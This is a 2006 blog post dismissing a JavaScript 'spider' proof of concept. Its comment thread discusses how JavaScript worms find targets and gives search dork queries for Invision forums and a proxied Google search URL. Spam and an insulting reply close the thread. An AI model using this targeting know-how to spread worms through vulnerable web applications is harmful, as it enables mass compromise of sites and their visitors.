I came across a site, today, that claimed to be a “new JavaScript attack vector” called the: JavaScript Spider. The result, however, is completely laughable. According to the web site:
The JavaScript Spider is the first implementation of a proof of concept tool which shows that Javascript can be in fact quite dangerous. This implementation depends on proxydrop.com but other proxies are possible as well: Google Translate is one of them. Keep in mind that the tool spiders only the first level.
I don’t think this guy knows what “attack vector†means. Using a publicly-accessible anonymous proxy is hardly a security concern – especially considering that none of the user’s personal information is being passed along.
Honestly, the only thing that that he “discovered†(and that was just something that he noticed, as the world has passed him by) is that publicly-accessible anonymous proxies can be used for “bad†things. Uhhh… duh?
Seriously, if every use of a server-side proxy was considered to be a client-side security risk, then we’d have a much larger issue on our hands. This quote, alone, helps to sum up his ignorance: “Javascript can be in fact quite dangerous.”
Cheston (October 8, 2006 at 5:44 pm)
I think I remember seeing this article on digg a few days ago, I read the first few sentences, saw his use of the term “attack vector”, and that kind of tipped me off that the whole thing was bs, so I just cried silently. I sometimes question why I read digg. =(
maluc (October 9, 2006 at 2:45 am)
You seem to know how to program in javascript.. but clearly do not understand the sandbox security known as the Same Origin Policy for javascript, and the security implications of working around it.
So allow me to shed some light into the largely unexplored field of javascript worms. These are worms which propagate by using client side javascript, executed anytime someone visits the infected page. The biggest hurdle in propagation is finding new targets.. which can be accomplished in one of four ways:
1.) Random IP dialing
2.) Browser Exploit
3.) Control Server
4.) Public Services
As I said, this field is largely unexplored, but these are the most common. Method 1 is very inefficient, unless it’s some global webserver exploit like one affecting Apache servers. Javascript worms, however, are mostly useful for propagating via exploits in web applications – like an SQL/XSS vulnerability in phpBB for example. Browser Exploits are uncommon, browser and version dependant, and if they let you bypass the same origin sandbox, they usually also allow remote code. In which case, you might as well infect the computer and run an executable that propagates. That requires both a browser and a webserver exploit, which is ideal but hard to come by.
And then there’s Method’s 3 and 4. Three is the usual way: Set up a Control Server to act as the worms head, locate potential vulnerable servers with it, pass their location to the client, client exploits it for you. The problem is this gives the worm a head, and when the heads chopped off the worm dies. Also for a large worm, you need a server that can handle such a huge load.
This is where pdp’s work with public services shows destructive potential. It’s still not a headless worm, but utilizing a server like google to search for vulnerable services .. http://www.gnucitizen.org/blog/google-search-api-worms .. allows a worm of any size/load. Google has been used for years to do this – in PHP, Perl, asp, c++, java, flash, etc – but until recently it’s been thought impossible to use javascript for it. That gives XSS and SQL vulnerabilities a very dangerous weapon. The javascript spider expands this to other common services like proxies.
It adds a extra level of danger to persistent XSS and SQL injections. Hopefully this isn’t all too difficult for you to grasp.. i tried to explain it as easy as possible. If so, stick to the del.icio.us widgets and leave web app security to brighter minds.
-maluc
Jonathan Snook (October 10, 2006 at 9:30 am)
By “attack vector”, I think he means “attack direction”. In other words, it’s an avenue in which an attack could be mounted.
There are two things here: replication and propogation.
The concept for replication is to use Google to find vulnerable sites based on known security issues, most likely through an SQL injection attack. Propogation relies on vulnerable sites having the ability to embed javascript payloads AND having those payloads accessible by other site visitors so that the replication process can begin again.
The biggest problem is that the replication process is likely relying on the same subset of results and the worm doesn’t necessarily know which sites are vulnerable and which have already been hit. Looking (very quickly) at the Google AJAX Search API, for example, reveals that the result set is small (8 results max) with no ability to offset or page through additional results. This would have your worm hit its wall very quickly. You’d also almost likely have to mount the attack via POST requests since a JS payload required to do replication could exceed the limits of a GET request.
I suppose I’d put it this way: Yes, it’s possible, but it seems a terribly inefficient approach unless you A) find an uncommon security hole that’s unlikely to be fixed and B) have a way to replicate it quickly and easily.
maluc (October 10, 2006 at 6:43 pm)
Yes, i’ve heard the same thing that you’re limited with GET requests to 100 characters per input.. although when testing i’m still able to use more than 100. Either way, making POST requests is not any tougher (i used Image() for simplicity). The result can look something like:
And yes, you’re right that googles API only allows the first 8 searches – yahoo the first 10. Writing such worms is not as simple as i spelled out. However a bit of creativity solves that. try googling these:
“powered by invision” “we have 7 registered”
“powered by invision” “we have 6 registered”
Both will give you a different subset of 8 URLs. And the nice thing about using proxies to do so, is that it can use the normal google search: http://www.proxydrop.com/index.php?__script_get_form=aHR0cDovL3d3dy5nb29nbGUuY29tL3NlYXJjaA%253D%253D&hl=en&q=%22powered+by+invision%22&btnG=Google+Search .. returning all results. Searching with searchmash however, includes the results in an easier to parse way.
It’s indeed less efficient, worms are inherently so. But it taps the resources of thousands of users, instead of just one. Thus muchhh more virulent. A.) should be a security hole in a common* web app.. and fixed soon or not, the damage is already done to all locateable vulnerable sites.
-maluc
pdp (October 10, 2006 at 8:23 pm)
you can use random words from the current resource to expand the result set provided by google. For example:
“powered by invision” “bla bla”
“powered by invision” inurl:php
“bla bla bla bla” “powered by invision”
will give you in total 24, probably different, results. The worm doesn’t need to carry a dictionary but use the word set that is available.
These types of worms are highly efficient!!! Look at Yamaner and Sammy.
maluc (October 10, 2006 at 8:52 pm)
i think he was referring to the efficiency of cross-domain javascript worms, at locating unique targets. Obviously the example i put wasn’t every efficient, as each user starts at the same 8 url’s.. it was only meant to explain as simplistic as possible. There’s alot of ways to write highly efficient targetting scripts, but there’s no need to go into such detail.
-maluc
Jordan Sissel (October 20, 2006 at 2:51 am)
maluc – I still fail to see why this is a javascript problem. You could just as easily crack (using your example) Invision and put a flash app that does exactly what the javascript does. It, too, can easily be self-propogating. Same with java. Heck, you could even do it with plain html and a META REFRESH tag. Trim that back to HTTP and you can use a generic 302 REDIRECT if you break the PHP or response codes.
Javascript is not special here.
Jordan Sissel (October 20, 2006 at 3:03 am)
I agree that you can use things like translate.google.com to get around the xss protection javascript has. However, this capability is not new, so why should it be so shocking?
However, consider the Invision example. If it doesn’t have a “proxy” that passes pages, then you can’t really do anything.
If you have a proxy:
http://www.foo.com/hurray?url=www.mybb.com
ahd /hurray just fetches the url and passes its contents to the user – none of the user’s cookies will be used since you’re on http://www.foo.com instea dof http://www.mybb.com. So even if the user *does* login, you’ll hae to do some crazy cookie and html mangling to get this to work.
am I wrong?
corridas (March 1, 2007 at 9:12 pm)
disegno piacevole, lavoro grande :)
mexico (March 1, 2007 at 9:33 pm)
i’am really impressed!!
grupos (March 1, 2007 at 9:54 pm)
luogo grande:) nessun osservazioni!
grupos (March 1, 2007 at 10:14 pm)
luogo grande:) nessun osservazioni!
mapa (March 1, 2007 at 10:56 pm)
sono eccitato circa questo luogo, buon lavoro!:)
los tres (March 1, 2007 at 11:17 pm)
disegno piacevole, lavoro grande :)
los tres (March 1, 2007 at 11:37 pm)
disegno piacevole, lavoro grande :)
servicios (March 1, 2007 at 11:58 pm)
I’ll tell my colleagues about your page..!
riesgos (March 2, 2007 at 12:21 am)
Interfaccia comoda, colori piacevoli, buoni!
revista (March 2, 2007 at 12:43 am)
sono eccitato circa questo luogo, buon lavoro!:)
revista (March 2, 2007 at 1:03 am)
sono eccitato circa questo luogo, buon lavoro!:)
ropa (March 2, 2007 at 1:24 am)
Ich fand gute und wichtige Informationen – dir zu danken.
este (March 2, 2007 at 1:45 am)
luogo grande:) nessun osservazioni!
residence (March 2, 2007 at 2:47 am)
luogo interessante, soddisfare interessante, buon!
analisis (March 2, 2007 at 3:08 am)
work’s done the way it must be..! ^^
sudoku (March 30, 2007 at 11:53 pm)
9 su 10! Ottenerlo! Siete buoni!
online dating tip (March 31, 2007 at 3:57 am)
Stupore! ho una sensibilità molto buona circa il vostro luogo!!!!
bellezza (March 31, 2007 at 8:02 am)
luogo fine, sapete..
lyrics (April 19, 2007 at 12:05 pm)
Grande! Il luogo cose buon, tutto e abbastanza ragionevole e piacevole..
sex (April 20, 2007 at 2:15 pm)
La buona visione del senso!
pagine bianche (April 21, 2007 at 7:51 am)
Interesting comments.. :D
coriere della sera (April 21, 2007 at 7:06 pm)
Luogo molto buon:) Buona fortuna!
bianchi (April 21, 2007 at 11:31 pm)
Lavoro eccellente! ..ringraziamenti per le informazioni..realmente lo apprezzo: D
[email protected] (October 28, 2007 at 6:12 am)
John, before you call GNUCitizen morons STFU.
These guys are some of the most respected researchers in the webappsec field and that “Javascript Spider” that you find hilarious was a very interesting peice of research on thier part.
So STFU, and get a job cleaning dishes somewhere as the security field has no place for you.